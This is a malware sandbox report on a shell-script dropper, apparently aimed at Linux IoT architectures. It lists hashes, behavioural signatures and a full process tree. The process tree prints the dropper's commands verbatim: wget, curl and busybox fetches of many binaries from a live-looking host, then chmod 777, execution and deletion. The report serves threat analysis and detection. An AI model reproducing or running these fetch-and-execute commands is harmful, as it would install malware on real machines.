Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 01:50
Static task
static1
Behavioral task
behavioral1
Sample
5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
-
Size
10KB
-
MD5
18767cb509f9d0bc866674148d1edcca
-
SHA1
7da11a4c8d3de676c5d337d2828d07d49613db95
-
SHA256
5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e
-
SHA512
13a40c89327145f35f25a8071216d8e8e1527b928229138ef80a5081b1f1cb06af23766b68a4ab80fbdb8113fa436576c6c60d0e94594052643aa02b715b1ec8
-
SSDEEP
96:YCafnjMdCnjMFHmnjMdpMojMkMyL8LALD2uLL7A787/4YALDfDzD8tlYzb3IsLOV:X45FY+6zI3TmU3Tx2
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 930 chmod 819 chmod 867 chmod 875 chmod 914 chmod 922 chmod 1008 chmod 836 chmod 954 chmod 977 chmod 985 chmod 993 chmod 1001 chmod 1015 chmod 829 chmod 883 chmod 906 chmod 969 chmod 859 chmod 938 chmod 962 chmod 1022 chmod 898 chmod 843 chmod 851 chmod 891 chmod 946 chmod 812 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E 813 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT 820 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz 830 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 837 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe 844 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 852 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu 860 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g 868 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq 876 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 884 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ 892 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 899 3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 907 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 915 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq 923 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 931 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu 939 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g 947 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 955 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ 963 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 970 3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 978 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 986 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe 994 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E 1002 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT 1009 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz 1016 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 1023 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 850 busybox 894 wget 828 busybox 890 busybox 992 busybox 1000 busybox 736 busybox 823 curl 856 curl 880 curl 942 wget 961 busybox 879 wget 913 busybox 959 curl 872 curl 910 wget 950 wget 966 curl 982 curl 984 busybox 888 curl 934 wget 1018 wget 833 curl 835 busybox 945 busybox 958 wget 981 wget 1005 curl 1007 busybox 729 curl 858 busybox 864 curl 921 busybox 937 busybox 990 curl 1004 wget 1011 wget 848 curl 863 wget 927 curl 1012 curl 847 wget 871 wget 919 curl 943 curl 968 busybox 1014 busybox 918 wget 935 curl 965 wget 997 wget 998 curl 815 wget 822 wget 895 curl 953 busybox 1019 curl 840 curl 866 busybox 874 busybox 887 wget 926 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq curl File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 curl File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E curl File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 curl File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe curl File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu curl File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 curl File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT curl File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz curl File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 curl File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu curl File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 curl File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 curl File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g curl File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 curl File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq curl File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g curl File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ curl File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E curl File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz curl File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 curl File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 curl File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT curl File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 curl File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ curl File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 curl File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe curl File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 curl
Processes
-
/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:707
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:713
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- System Network Configuration Discovery
PID:736
-
-
/bin/chmodchmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:814
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- System Network Configuration Discovery
PID:815
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:818
-
-
/bin/chmodchmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:821
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- System Network Configuration Discovery
PID:822
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- System Network Configuration Discovery
PID:828
-
-
/bin/chmodchmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:831
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:832
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- System Network Configuration Discovery
PID:835
-
-
/bin/chmodchmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:838
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:839
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:842
-
-
/bin/chmodchmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:846
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- System Network Configuration Discovery
PID:847
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- System Network Configuration Discovery
PID:850
-
-
/bin/chmodchmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:854
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:855
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- System Network Configuration Discovery
PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- System Network Configuration Discovery
PID:874
-
-
/bin/chmodchmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:882
-
-
/bin/chmodchmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:897
-
-
/bin/chmodchmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3./3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm 3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:905
-
-
/bin/chmodchmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- System Network Configuration Discovery
PID:913
-
-
/bin/chmodchmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:929
-
-
/bin/chmodchmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- System Network Configuration Discovery
PID:937
-
-
/bin/chmodchmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- System Network Configuration Discovery
PID:950
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- System Network Configuration Discovery
PID:953
-
-
/bin/chmodchmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- File and Directory Permissions Modification
PID:954
-
-
